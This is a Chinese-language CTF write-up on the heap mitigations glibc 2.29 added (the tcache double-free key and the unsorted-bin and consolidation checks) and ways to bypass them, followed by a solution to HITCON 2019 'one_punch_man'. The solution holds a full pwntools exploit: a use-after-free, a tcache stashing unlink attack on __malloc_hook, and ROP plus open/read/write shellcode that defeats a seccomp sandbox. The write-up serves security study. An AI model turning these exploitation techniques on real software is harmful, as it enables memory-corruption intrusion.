新增保护机制

tcache

tcache_entry结构体新增了一个指针key存放在chunk的bk处,tache_put写入,tcache_get清空

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);

/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache;

e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}

tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
assert (tc_idx < TCACHE_MAX_BINS);
assert (tcache->entries[tc_idx] > 0);
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]);
e->key = NULL;
return (void *) e;
}

在free一个tcache时,新增一个判断分支:如果bk==key则会遍历tcache检查是否有相同的chunk

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);
if (tcache != NULL && tc_idx < mp_.tcache_bins)
{
/* Check to see if it's already in the tcache. */
tcache_entry *e = (tcache_entry *) chunk2mem (p);

/* This test succeeds on double free. However, we don't 100%
trust it (it also matches random payload data at a 1 in
2^<size_t> chance), so verify it's not an unlikely
coincidence before aborting. */
if (__glibc_unlikely (e->key == tcache))
{
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx];
tmp;
tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}

if (tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (p, tc_idx);
return;
}
}
}
#endif

如何绕过呢??

  • 修改bk使不进入循环分支

  • 修改size从而修改tc_idx

  • house of botcake:合并chunk1 chunk2进unsortedbins,将chunk2链进tcache,从chunk1分配一个大chunk造成overlapped到chunk2修改其fd

  • fastbin_reverse_into_tcache

unsortedbins

新增检查

  • size是否合理

  • next chunk的prev_size是否等于victim的size

  • 双向链表完整性检查

  • next chunk的prev_inuse位是否为0

1
2
3
4
5
6
7
8
9
10
if (__glibc_unlikely (size <= 2 * SIZE_SZ)
|| __glibc_unlikely (size > av->system_mem))
malloc_printerr ("malloc(): invalid size (unsorted)");
if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
if (__glibc_unlikely (bck->fd != victim)
|| __glibc_unlikely (victim->fd != unsorted_chunks (av)))
malloc_printerr ("malloc(): unsorted double linked list corrupted");
if (__glibc_unlikely (prev_inuse (next)))
malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");

malloc overlap

当向后合并(低地址)时,会检查上个chunk的size和当前chunk的prev_size是否相等

1
2
3
4
5
6
7
8
9
/* consolidate backward */
if (!prev_inuse(p)) {
prevsize = prev_size (p);
size += prevsize;
p = chunk_at_offset(p, -((long) prevsize));
if (__glibc_unlikely (chunksize(p) != prevsize))
malloc_printerr ("corrupted size vs. prev_size while consolidating");
unlink_chunk (av, p);
}

以下假设有off by null漏洞👇

在之前的glibc版本中还存在双向链表检查,我们一般是通过将要合并的chunk放入unsortedbins中获得系统给的fd和bk来绕过以达到chunk overlapping的目的。但是2.29的新机制无法通过这个方式绕过双向链表检查。

如何绕过呢???

主要思路是利用从largebin中分配的残留指针 fd_nextsize / bk_nextsize,因为largebin中只有一个chunk时,这两个指针指向自己,先通过部分覆盖修改fb_nextsize的第一个字节,使其指向一个我们可以控制bk的chunk,例如利用smallbins或unsortedbins的机制部分覆盖bk指向fake_chunk。这时bk_nextsize仍然指向自己。利用同样的思路将其链入fastbins中部分覆盖第一个字节使其指向fake_chunk。这样双向链表就构造好了

总结一下就是利用smallbins会在bk写入堆地址,fastbins会在fd写入堆地址,然后部分覆盖构造双向链表。但是我们无法保证堆地址第二个字节是\x00,所以这种攻击方式有6.25%的概率会成功:]

top chunk

1
2
if (__glibc_unlikely (size > av->system_mem))
malloc_printerr ("malloc(): corrupted top size");

GG

Hitcon-CTF2019-one_punch_man

保护全开

1
2
3
4
5
Arch:     amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled

程序有5个功能:

add

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
unsigned __int64 __fastcall Add(__int64 a1, __int64 a2)
{
unsigned int idx; // [rsp+8h] [rbp-418h]
signed int name_len; // [rsp+Ch] [rbp-414h]
char s[1032]; // [rsp+10h] [rbp-410h]
unsigned __int64 v6; // [rsp+418h] [rbp-8h]

v6 = __readfsqword(0x28u);
MyPuts("idx: ");
idx = read_int();
if ( idx > 2 )
error((__int64)"invalid");
MyPuts("hero name: ");
memset(s, 0, 1024uLL);
name_len = read(0, s, 0x400uLL);
if ( name_len <= 0 )
error((__int64)"io");
s[name_len - 1] = 0;
if ( name_len <= 0x7F || name_len > 0x400 )
error((__int64)"poor hero name");
*((_QWORD *)&unk_4040 + 2 * idx) = calloc(1uLL, name_len);
qword_4048[2 * idx] = name_len;
strncpy(*((char **)&unk_4040 + 2 * idx), s, name_len);
memset(s, 0, 0x400uLL);
return __readfsqword(0x28u) ^ v6;
}

在这个函数里允许我们分配0x80-0x400大小的chunk,并把初始化chunk的内容先保存在栈上再通过strncpy传送到堆里,rebase(0x4040)会依次保存chunk地址和大小且只能同时分配三个。注意这里分配chunk使用的是calloc,即不会从tcache中取chunk。

free

1
2
3
4
5
6
7
8
9
10
void __fastcall Delete(__int64 a1, __int64 a2)
{
unsigned int v2; // [rsp+Ch] [rbp-4h]

MyPuts("idx: ");
v2 = read_int();
if ( v2 > 2 )
error((__int64)"invalid");
free(*((void **)&unk_4040 + 2 * v2)); // uaf
}

这里没有对指针清空,存在uaf

backdoor

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
ssize_t __fastcall Magic(__int64 a1, __int64 a2)
{
void *buf; // [rsp+8h] [rbp-8h]

if ( *(_BYTE *)(qword_4030 + 0x20) <= 6 )
error((__int64)"gg");
buf = malloc(0x217uLL);
if ( !buf )
error((__int64)"err");
if ( read(0, buf, 0x217uLL) <= 0 )
error((__int64)"io");
puts("Serious Punch!!!");
puts((const char *)&unk_2128);
return puts((const char *)buf);
}

程序留了一个后门函数可以调用malloc,限制了利用条件 *(heap_base+0x30) > 6

edit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
ssize_t __fastcall rename(__int64 a1, __int64 a2)
{
ssize_t result; // rax
unsigned int v3; // [rsp+Ch] [rbp-4h]

MyPuts("idx: ");
v3 = read_int();
if ( v3 > 2 )
error((__int64)"invalid");
if ( !*((_QWORD *)&unk_4040 + 2 * v3) )
error((__int64)"err");
MyPuts("hero name: ");
result = read(0, *((void **)&unk_4040 + 2 * v3), qword_4048[2 * v3]);
if ( result <= 0 )
error((__int64)"io");
return result;
}

show

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
ssize_t __fastcall Show(__int64 a1, __int64 a2)
{
ssize_t result; // rax
unsigned int v3; // [rsp+Ch] [rbp-4h]

MyPuts("idx: ");
v3 = read_int();
if ( v3 > 2 )
error((__int64)"invalid");
result = *((_QWORD *)&unk_4040 + 2 * v3);
if ( result )
{
MyPuts("hero name: ");
result = puts(*((const char **)&unk_4040 + 2 * v3));
}
return result;
}

因为存在uaf,所以我们可以很容易地leak出堆地址和libc地址,同时存在edit函数可以修改tcache的fd,只要可以调用程序留给我们的后门函数中的malloc就可以实现任意地址写

那么如何将heap_base+0x30处的值修改为一个large value呢

这里就要用到glibc2.29下的一种利用手法tcache_stashing_unlink_attack

先贴主要用到的glibc源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
if (in_smallbin_range (nb))
{
idx = smallbin_index (nb);
bin = bin_at (av, idx);

if ((victim = last (bin)) != bin)
{
bck = victim->bk;
if (__glibc_unlikely (bck->fd != victim))
malloc_printerr ("malloc(): smallbin double linked list corrupted");
set_inuse_bit_at_offset (victim, nb);
bin->bk = bck;
bck->fd = bin;

if (av != &main_arena)
set_non_main_arena (victim);
check_malloced_chunk (av, victim, nb);
#if USE_TCACHE
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;

/* While bin not empty and tcache not full, copy chunks over. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = last (bin)) != bin)
{
if (tc_victim != 0)
{
bck = tc_victim->bk;
set_inuse_bit_at_offset (tc_victim, nb);
if (av != &main_arena)
set_non_main_arena (tc_victim);
bin->bk = bck;
bck->fd = bin;

tcache_put (tc_victim, tc_idx);
}
}
}
#endif

因为我们无法像how2heap中修改fake_chunk->fd为一个可写的地址,所以我们只在tcache中预留一个位置

那么如何使得smallbins存在两个chunk并且相应大小的tcache未满呢??

这里用到一个技巧,通过分配并释放一个较大的chunk,然后利用分割机制拿到我们想要的size

1
2
3
4
5
6
7
8
9
10
11
12
add(0,"aaaa",0x210)
add(2,"tcache",0x210)
free(2)#fill tcache done
add(1,"bbbb",0x210)
·
·
·
free(0)
add(2,"cccc",0x180)
free(1)
add(2,"dddd",0x180)
add(2,"cccc",0xa0)#malloc_consolidate

此时的堆布局:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
pwndbg> bins
tcachebins
0x90 [ 6]: 0x564cf556c850 —▸ 0x564cf556c7c0 —▸ 0x564cf556c730 —▸ 0x564cf556c6a0 —▸ 0x564cf556c610 —▸ 0x564cf556c580 ◂— 0x0
0x220 [ 7]: 0x564cf556c140 —▸ 0x7f1d7731dc30 (__malloc_hook) ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0x90: 0x564cf556c4e0 —▸ 0x564cf556c0a0 —▸ 0x7f1d7731dd20 (main_arena+224) ◂— 0x564cf556c4e0
largebins
empty
pwndbg> x/2gx 0x564cf556c4e0
0x564cf556c4e0: 0x0000000000000000 0x0000000000000091
pwndbg> x/2gx 0x564cf556c0a0
0x564cf556c0a0: 0x0000000000000000 0x0000000000000091

然后修改chunk1的bk为heap_base+0x20,再分配一个相应大小的chunk触发攻击

chunk1会链入相应的tcache,heap_base+0x20处的fake_chunk会被当成bck,并会将smallbin赋值给其fd

1
2
3
4
5
6
7
8
9
pwndbg> x/10gx 0x564cf556b000
0x564cf556b000: 0x0000000000000000 0x0000000000000251
0x564cf556b010: 0x0700000000000000 0x0000000000000000
0x564cf556b020: 0x0000000000000000 0x0000000000000000
0x564cf556b030: 0x00007f1d7731dd20 0x0000000000000000
0x564cf556b040: 0x0000000000000000 0x0000000000000000
pwndbg> x/4gx 0x00007f1d7731dd20
0x7f1d7731dd20 <main_arena+224>: 0x00007f1d7731dd10 0x00007f1d7731dd10
0x7f1d7731dd30 <main_arena+240>: 0x0000564cf556c4e0 0x0000564cf556b020

此时tache已经被我们打烂了。。至于怎么烂的我也不知道。。还好我们之前已经修改了fd,这时直接调用malloc就可以劫持malloc_hook

1
2
3
4
5
6
7
8
9
pwndbg> bins
tcachebins
0x90 [ 7]: 0x564cf556c4f0 —▸ 0x564cf556c850 —▸ 0x564cf556c7c0 —▸ 0x564cf556c730 —▸ 0x564cf556c6a0 —▸ 0x564cf556c610 —▸ 0x564cf556c580 ◂— 0x0
0x220 [ 32]: 0x564cf556c140 —▸ 0x7f1d7731dc30 (__malloc_hook) ◂— 0x0
0x230 [-35]: 0x0
0x240 [ 49]: 0x0
0x250 [119]: 0x0
0x260 [ 29]: 0x0
0x270 [127]: 0x0

因为这题使用 seccomp 开启了沙箱保护,只有白名单上的系统调用可以使用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# seccomp-tools dump ./one_punch
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x01 0x00 0xc000003e if (A == ARCH_X86_64) goto 0003
0002: 0x06 0x00 0x00 0x00000000 return KILL
0003: 0x20 0x00 0x00 0x00000000 A = sys_number
0004: 0x15 0x00 0x01 0x0000000f if (A != rt_sigreturn) goto 0006
0005: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0006: 0x15 0x00 0x01 0x000000e7 if (A != exit_group) goto 0008
0007: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0008: 0x15 0x00 0x01 0x0000003c if (A != exit) goto 0010
0009: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0010: 0x15 0x00 0x01 0x00000002 if (A != open) goto 0012
0011: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0012: 0x15 0x00 0x01 0x00000000 if (A != read) goto 0014
0013: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0014: 0x15 0x00 0x01 0x00000001 if (A != write) goto 0016
0015: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0016: 0x15 0x00 0x01 0x0000000c if (A != brk) goto 0018
0017: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0018: 0x15 0x00 0x01 0x00000009 if (A != mmap) goto 0020
0019: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0020: 0x15 0x00 0x01 0x0000000a if (A != mprotect) goto 0022
0021: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0022: 0x15 0x00 0x01 0x00000003 if (A != close) goto 0024
0023: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0024: 0x06 0x00 0x00 0x00000000 return KILL

我们无法执行execve系统调用,只能用过orw(open/read/write)来读取flag

因为调用add函数时,程序先将我们的输入放在了栈上,所以考虑在此处构造rop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
pwndbg> stack 20
00:0000│ rsp 0x7ffd2f88c210 —▸ 0x7f570f3814c0 (_dl_tunable_set_mallopt_check) ◂— mov eax, dword ptr [rdi]
01:00080x7ffd2f88c218 ◂— 0x10100000002
02:0010│ rsi 0x7ffd2f88c220 —▸ 0x7f570f3229a0 (init_cacheinfo+240) ◂— pop rdi
03:00180x7ffd2f88c228 —▸ 0x564a8ba4e000 ◂— 0x0
04:00200x7ffd2f88c230 —▸ 0x7f570f3253a5 (insert_module+85) ◂— pop rsi
05:00280x7ffd2f88c238 ◂— 0x10000
06:00300x7ffd2f88c240 —▸ 0x7f570f302b9a ◂— pop rdx
07:00380x7ffd2f88c248 ◂— 0x7
08:00400x7ffd2f88c250 —▸ 0x7f570f3ee370 (mprotect) ◂— mov eax, 0xa
09:00480x7ffd2f88c258 —▸ 0x564a8ba4f990 ◂— 0x3148c03148e78948
0a:00500x7ffd2f88c260 ◂— 0x67616c66 /* 'flag' */
0b:00580x7ffd2f88c268 ◂— 0x0
...

在调用calloc里有一系列抬高栈顶的操作,将malloc_hook改为add rsp,48h;ret就可以执行我们构造的rop

完整exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
from pwn_debug import*
pdb = pwn_debug("./one_punch")
pdb.debug('2.29')
p = pdb.run("debug")

#context.log_level = "debug"
libc = ELF("/glibc/x64/2.29/lib/libc-2.29.so")
one_gadget = [0xc1720,0xdf212,0xdf21e]

def add(index,content,size):
p.sendlineafter("> ","1")
p.sendlineafter("idx: ",str(index))
p.sendlineafter("name: ",content.ljust(size,'\x00'))

def edit(index,content):
p.sendlineafter("> ","2")
p.sendlineafter("idx: ",str(index))
p.sendlineafter("name: ",content)

def show(index):
p.sendlineafter("> ","3")
p.sendlineafter("idx: ",str(index))

def free(index):
p.sendlineafter("> ","4")
p.sendafter("idx: ",str(index))

def malloc(content):
p.sendlineafter("> ","50056")
p.sendline(content)

def g():
gdb.attach(p,"b *$rebase(0x1235)")

for i in range(6):
add(0,"aaaa",0x210)
free(0)
show(0)
heap_leak = u64(p.recvuntil('\n',drop=True)[-6:].ljust(8,'\x00'))
heap_base = heap_leak - 0x4e0 - 0x5c0 - 0x40
info("heap_base:" + hex(heap_base))
add(0,"aaaa",0x210)
add(2,"tcache",0x210)
free(2)#fill tcache done
add(1,"bbbb",0x210)

free(0)
show(0)
libc_leak = u64(p.recvuntil('\n',drop=True)[-6:].ljust(8,'\x00'))
libc.address = libc_leak - 0x3b3ca0
info("libc_base:" + hex(libc.address))

edit(2,p64(libc.sym['__malloc_hook']))#change fd

add(0,"aaaa",0x210)

for i in range(6):
add(2,"aaaa",0x80)
free(2)
free(0)
add(2,"cccc",0x180)
free(1)
add(2,"dddd",0x180)
add(2,"cccc",0xa0)
edit(1,"a"*0x180+p64(0)+p64(0x91)+p64(heap_base+0x10a0) + p64(heap_base + 0x20))
add(2,"eeee",0x80)

pop_rdi = libc.address + 0x219a0
pop_rsi = libc.address + 0x243a5
pop_rdx = libc.address + 0x1b9a
mprotect = libc.sym['mprotect']

rop = flat(
pop_rdi,
heap_base,
pop_rsi,
0x10000,
pop_rdx,
7,
mprotect,
heap_base+0x1990
)
sc = asm(
'''
mov rdi, rsp;
xor rax, rax;
xor rsi, rsi;
mov al, 2;
syscall;

mov rsi, rdi;
mov rdi, rax;
mov dx, 0x123;
xor rax, rax;
syscall;

xor rdi,rdi;
add rdi, 1;
xor rax, rax;
mov al, 1;
syscall;
'''
)
add(0,sc,0x100)#orw

malloc("cccc")
g()
malloc("ff"+p64(libc.address+0xbe131))#add rsp,0x48;ret

add(2,(rop+"flag\x00"),0x400)

p.interactive()

reference

https://bbs.pediy.com/thread-257901.htm

http://blog.eonew.cn/archives/1233